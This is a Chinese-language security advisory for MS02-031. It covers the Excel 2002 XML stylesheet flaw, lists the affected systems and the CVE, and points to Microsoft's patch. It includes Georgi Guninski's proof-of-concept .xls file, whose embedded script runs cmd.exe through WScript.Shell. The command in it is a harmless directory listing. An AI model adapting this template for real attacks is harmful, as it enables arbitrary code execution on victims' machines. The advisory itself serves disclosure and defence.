Microsoft Excel 2002 XML样式表单任意指令执行漏洞(MS02-031)
发布日期:2002-05-24
更新日期:2002-05-28
受影响系统:Microsoft Windows NT 4.0SP6a
Microsoft Windows NT 4.0SP6
Microsoft Windows NT 4.0SP5
Microsoft Windows NT 4.0SP4
Microsoft Windows NT 4.0SP3
Microsoft Windows NT 4.0SP2
Microsoft Windows NT 4.0SP1
Microsoft Windows NT 4.0
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 95OSR2
Microsoft Windows 95
Microsoft Windows 2000SP2
Microsoft Windows 2000SP1
Microsoft Windows 2000
描述:
BUGTRAQ ID:
4821
CVE(CAN) ID:
CVE-2002-0615
Microsoft Excel 2002是一款Microsoft公司分发和维护的流行的办公软件。
Microsoft Excel 2002在处理带有XML样式表单(sytlesheet)的XML文档时存在漏洞,可导致远程攻击者以Excel进程权限在目标系统中执行任意命令。
当Microsoft Excel 2002装载带有XML样式表单(sytlesheet)的XML文档时,用户会选择是否装载相关的样式表单,如果XML样式表单(sytlesheet)中包含Javascript & VBscript脚本,然后用户在查看.xls文件时又采用样式表单,脚本就会在没有提示的情况下执行。攻击者可以利用WEB页面或者EMAIL进行夹带.xls文件进行攻击,以excel进程的权限在目标系统中执行任意命令。
默认情况下,Microsoft Excel 2002不装载XML样式表单(sytlesheet)。
<*来源:Georgi Guninski (
guninski@guninski.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (
guninski@guninski.com)提供了如下测试方法:
------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="
http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 不要用Microsoft Excel 2002随意打开不明.xls文件。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS02-031)以及相应补丁:
MS02-031:Cumulative Patches for Excel and Word for Windows (Q324458)
链接:
http://www.microsoft.com/technet/security/bulletin/MS02-031.asp浏览次数:3152
严重程度:0(网友投票)
